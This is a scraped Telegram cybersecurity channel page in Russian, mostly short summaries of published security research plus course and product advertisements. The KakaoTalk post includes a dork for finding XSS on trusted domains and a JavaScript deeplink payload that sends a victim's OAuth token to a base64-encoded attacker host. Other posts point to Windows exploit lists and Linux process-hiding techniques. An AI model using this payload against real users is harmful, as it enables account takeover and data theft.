Хакер {Hacker} @thehaking Channel on Telegram

Хакер {Hacker}

@thehaking


Канал о кибербезопасности
- Защита
- Кодинг
- Новости
- Интервью
- Безопасность в сети

По всем вопросам @evgenycarter

Хакер {Hacker} (Russian)

Вы когда-нибудь задумывались о том, как обезопасить свои данные в сети? Если да, то канал Хакер {Hacker} (@thehaking) станет вашим надежным проводником в мире кибербезопасности. Этот канал предлагает широкий спектр информации о защите данных, кодинге, последних новостях в мире безопасности, интервью с экспертами и многое другое. Здесь вы найдете полезные советы и рекомендации о том, как обезопасить свои данные и сохранить их конфиденциальность. Кроме того, у вас есть возможность общаться с другими участниками канала и делиться своим опытом. Подписывайтесь на канал Хакер {Hacker} (@thehaking) уже сегодня и станьте частью сообщества, которое ценит безопасность в сети. По всем вопросам обращайтесь к администратору @evgenycarter.

Хакер {Hacker}

21 Nov, 06:01


Компоненты AD Kerberos, Microsoft SQL Server и центр сертификации — как их взломать?
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff

Старт: 16 декабря. Успейте приобрести курс по старой цене до конца ноября!*

Содержание курса:
- Архитектура AD и ее базис
- Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
- Как закрепиться внутри? Техники и эксплоиты

На 100% прикладной курс:
практическая лаборатория AD содержит 16 виртуальных машин, позволяя участникам отточить свои навыки на практике в 100+ рабочих тасках

🏆 Сертификат / удостоверение о повышении квалификации 

*С декабря стоимость курсов увеличится на 15%

@Codeby_Academy
Подробнее о курсе

Хакер {Hacker}

20 Nov, 20:35


JavaScript для хакеров: простой экспертный гид

В статье рассказывается о том, как JavaScript используется в этичном хакинге и тестировании на проникновение.

Основные темы включают:

1. Веб-эксплуатация: Анализ и манипулирование веб-приложениями, например, проверка полей ввода на наличие XSS-уязвимостей.

2. Автоматизация: Написание скриптов для автоматизации задач, таких как извлечение данных или моделирование атак.

3. Разработка инструментов: Создание пользовательских утилит для поиска уязвимостей или взаимодействия с API.

4. Обучение этичному хакингу: Практическое применение JavaScript делает его удобным инструментом для начинающих в кибербезопасности.

https://www.stationx.net/javascript-for-hacking/

👉@thehaking

Хакер {Hacker}

18 Nov, 21:33


Exploit-Street

Полный список эксплойтов LPE для Windows (начиная с 2023 года)
Я обнаружил, что по какой-то причине в интернете нет списка новых эксплойтов для Windows. Пришло время исправить это :)


.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | '-__ | | | |
|' | |. | | | | | |
_| '-' ' "" '-' '-.' '` |__
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

https://github.com/MzHmO/Exploit-Street

👉@thehaking

Хакер {Hacker}

14 Nov, 08:01


🌸Новый выпуск подкаста «Безопасно говоря» — информационная безопасность в автопроме

В этот раз наши ведущие Рами Мулейс и Алексей Миртов обсудили с экспертами последние тренды безопасности в автомобильной отрасли. Эта сфера тесно связана с информационными технологиями, но есть существенная разница между ИТ-компаниями и автопромом.

Вы узнаете, как устроены современные автомобили с точки зрения информационной безопасности и чем занимаются службы ИБ у автопроизводителей. Спойлер: ответы на эти вопросы довольно неожиданны.

В гостях:

🌟Борис Цорионов, директор по разработке цифровых сервисов Pango Cars;
🌟Павел Куликов, директор по кибербезопасности бренда «Атом».

Слушайте выпуск, где удобно:

⭐️ Яндекс Музыка
⭐️ YouTube

Поделиться своим опытом, задать нам вопрос или предложить свои темы для новых выпусков вы можете в комментариях или на почте: [email protected].

#yacloud_podcasts

Хакер {Hacker}

14 Nov, 05:01


Взлом Kia: удалённое управление автомобилями с помощью одного только номера автомобиля.

11 июня 2024 года мы обнаружили набор уязвимостей в автомобилях Kia, которые позволяли удалённо управлять ключевыми функциями, используя только номерной знак. Эти атаки можно было осуществить дистанционно на любом автомобиле, оснащённом необходимым оборудованием, за примерно 30 секунд, независимо от того, был ли активирован подписочный сервис Kia Connect.

Кроме того, злоумышленник мог бесшумно получить личную информацию, включая имя, номер телефона, адрес электронной почты и физический адрес жертвы. Это позволяло злоумышленнику добавить себя как невидимого второго пользователя в системе автомобиля жертвы без её ведома.

https://samcurry.net/hacking-kia

👉@thehaking

Хакер {Hacker}

13 Nov, 21:26


1-click exploit in KakaoTalk’s Android app to disclose users' chat messages

Account Takeover в самом популярном у корейцев мессенджере KakaoTalk.

Когда открывается диплинк, в него отправляется OAuth-токен пользователя, но только если домен доверенный, — проблема, и вот как она решается.

1. Находим XSS на домене из белого списка с помощью дорки:


site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com


2. Отправляем не подозревающему собеседнику ссылку на свой сайт evil.com, где должен быть размещен следующий JS-код с XSS:


location.href = kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">


Он откроет вебвью, приложение отправит OAuth-токен на домен из белого списка и выполнит XSS с редиректом и токеном на сайт хакера.

https://stulle123.github.io/posts/kakaotalk-account-takeover/

👉@thehaking

Хакер {Hacker}

13 Nov, 05:51


Эксплуатация Spectre через межпроцессный доступ

Writeup: https://grsecurity.net/cross_process_spectre_exploitation

Paper: https://comsec.ethz.ch/wp-content/files/ibpb_sp25.pdf

👉@thehaking

Хакер {Hacker}

12 Nov, 07:00


Почему специалисты по кибербезопасности зарабатывают 200 тысяч?

Количество кибератак на сервисы российских компаний растёт каждый квартал. А по Указу Президента, госучреждения, банки, производства и другие критические сферы должны усиливать безопасность.

Сейчас фирмы нанимают новых специалистов по кибербезопасности и готовы платить им больше других айтишников. Ведь они буквально спасают ценные данные. Научиться защищать сервера и начать карьеру в IT вы сможете на курсе Skillbox «Специалист по кибербезопас­но­сти».

За 12 месяцев вы на практике научитесь отражать кибератаки, находить утечки и расследовать инциденты. А найти первую работу сможете уже через полгода — мы вам с этим поможем.

Начать учиться можно бесплатно! Вы получите доступ к 5 первым темам и практическим работам. Если всё понравится, сможете продолжить обучение: https://epic.st/KIEq-?erid=2VtzqwwgWo7
Черная пятница! Скидки до 60% +3 курса в подарок!

Реклама. ЧОУ ДПО «Образовательные технологии «Скилбокс (Коробка навыков)», ИНН: 9704088880

Хакер {Hacker}

11 Nov, 20:16


Ключ от всех дверей: как нашли бэкдор в самых надежных* картах доступа

Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?

В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.

В этой статье я расскажу захватывающую историю о том, как нашли этот бэкдор, и разберу катастрофические последствия его внедрения. Этот случай наглядно демонстрирует рискованность слепого доверия маркетинговым заявлениям о безопасности и важность независимого аудита критических систем.

https://habr.com/ru/companies/bastion/articles/854974/

👉@thehaking

Хакер {Hacker}

11 Nov, 12:49


MikroTik Nightmare. Пентестим сетевое оборудование MikroTik

Это авторское исследование о безопасности оборудования MikroTik с точки зрения атакующего. Оборудование MikroTik крайне популярно и нередко становится жертвой разных атак. Я сделаю акцент на постэксплуатации. Также затрону проблему безопасности защитных механизмов RouterOS, недостатками которых пользуются атакующие.

https://telegra.ph/MikroTik-Nightmare-Pentestim-setevoe-oborudovanie-MikroTik-11-11

🔐 @xakep_1

Хакер {Hacker}

11 Nov, 09:38


Что такое виртуальная память и как она помогает эффективно распределять ресурсы? Как система может выделить больше памяти, чем на самом деле доступно на сервере? На нашем вебинаре разберем ключевые вопросы управления памятью в Linux.

Узнаете об эволюции адресации памяти и поймете, зачем используется swap и как работает OOM Killer, защищая систему от нехватки ресурсов.

Погружаясь в тонкости управления памятью, вы сможете оптимизировать свои процессы в Linux и лучше понимать поведение системы под нагрузкой.

Присоединяйтесь 14 ноября в 19:00, чтобы расширить свои знания и улучшить свои навыки работы с памятью в Linux.

Присоединяйтесь и получите скидку на участие в курсе «Computer Sciences»: https://vk.cc/cEvvPc

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

Хакер {Hacker}

10 Nov, 13:41


Шпаргалка по NMAP

👉@thehaking

Хакер {Hacker}

08 Nov, 08:04


Скрытие процессов Linux

https://dfir.ch/posts/slash-proc/

https://righteousit.com/2024/07/24/hiding-linux-processes-with-bind-mounts/


👉@thehaking

Хакер {Hacker}

08 Nov, 06:00


СТАНЬТЕ ПРОФЕССИОНАЛОМ ПЕНТЕСТА
Приглашаем на курс по этичному хакингу от Академии АйТи.
Изучите новейшие техники отражения кибератак, арсенал злоумышленников.
🔶перехват сеанса
🔶экплойты и методы защиты от них
🔶атаки с использованием Web-уязвимостей
Практикум по взлому, блок по криптографии, противодействие прослушиванию, перехвату сеанса, обход IDS и Honeypot, и многое другое, итоговая работа на киберполигоне.
🔥Рассрочка без %
Удостоверение повышения квалификации
ЗАПИСЬ И ПОДРОБНОСТИ О КУРСЕ

#реклама
О рекламодателе

Хакер {Hacker}

08 Nov, 05:01


Анализ уязвимости драйвера Wi-Fi в Windows nwifi.sys (CVE-2024-30078)

В июне, во время «Patch Tuesday», Microsoft выпустила исправление для уязвимости CVE-2024-30078. Эта уязвимость была оценена как важная, так как она может привести к удаленному выполнению кода (RCE).

После прочтения бюллетеня Microsoft эта уязвимость привлекла наше внимание. Казалось вероятным, что неавторизованный злоумышленник может отправить вредоносный пакет на соседнюю систему, что потенциально позволит выполнить удаленный код. Даже если злоумышленнику нужно находиться в непосредственной близости от целевой системы для отправки и получения радиопередач для эксплуатации этой уязвимости, возможность удаленного выполнения кода по беспроводной связи показалась слишком интересной, чтобы её упустить.

Наш анализ был проведен на Windows 11, версия 23H2.

https://www.crowdfense.com/windows-wi-fi-driver-rce-vulnerability-cve-2024-30078/

👉@thehaking

Хакер {Hacker}

07 Nov, 18:20


Эксплуатация переполнения пула ядра при ограниченном размере фрагмента (CVE-2021-31969)

Распространенность ошибок, связанных с повреждением памяти, по-прежнему представляет серьезную проблему для эксплуатации. Увеличение сложности их использования связано с развитием защитных механизмов и растущей сложностью программных систем. Хотя для исправления ошибки зачастую достаточно базового прототипа, создание полноценного эксплойта, способного обходить существующие контрмеры, дает ценные сведения о возможностях продвинутых злоумышленников.
Это особенно актуально для драйвера cldflt.sys, который регулярно получает обновления безопасности каждую Patch Tuesday с июня. Примечательно, что он стал объектом внимания злоумышленников после использования уязвимостей в драйверах clfs.sys и afd.sys. В данной статье мы стремимся подчеркнуть важность драйвера cldflt.sys и призываем к проведению дополнительных исследований, направленных на изучение этого драйвера и связанных с ним компонентов.

https://starlabs.sg/blog/2023/11-exploitation-of-a-kernel-pool-overflow-from-a-restrictive-chunk-size-cve-2021-31969/

👉@thehaking

Хакер {Hacker}

06 Nov, 09:28


🔥 Это всё меняет!

Positive Technologies 20 ноября запустит PT NGFW. Станьте частью этого масштабного события!

🤟 Два года компания разрабатывала высокопроизводительный и надежный межсетевой экран нового поколения.

Команда прислушивалась к мнению клиентов и партнеров, открыто рассказывала про внутреннюю кухню разработки. Смело бралась за сложные инженерные задачи, уделяла внимание не только коду, но и аппаратной платформе.

В результате они создали совершенное устройство, которое запустят 20 ноября!

👀 На онлайн-запуске вы сможете окунуться в историю создания продукта, узнать, как он защищает от киберугроз, результаты тестирования и завершенных проектов, а также планы на будущее.

Регистрируйтесь на онлайн-запуск заранее на сайте Positive Technologies.

Будем ждать каждого! 🤩

Хакер {Hacker}

04 Nov, 07:07


Реверс-инжиниринг и разборка наушников Kekz

Почти год назад я наткнулся на наушники Kekz, которые показались мне интересным подходом к цифровым аудиоустройствам. Они заявляли, что работают без подключения к интернету, и весь контент уже хранится непосредственно в наушниках. Это накладные наушники, которые работают путем вставки небольшого чипа (я называю их «Kekz» или «Cookie») в специальный разъем сбоку, после чего воспроизводится аудиоистория. Мне стало любопытно, так как ходили некоторые слухи о том, как они работают с этими чипами «Kekz».

Я приглашаю вас присоединиться ко мне в путешествии по внутреннему устройству этих наушников. Мы поговорим о доступе к зашифрованным файлам на устройстве, о взломе шифрования и о выявлении утечки данных клиентов.

https://nv1t.github.io/blog/kekz-headphones/

👉@thehaking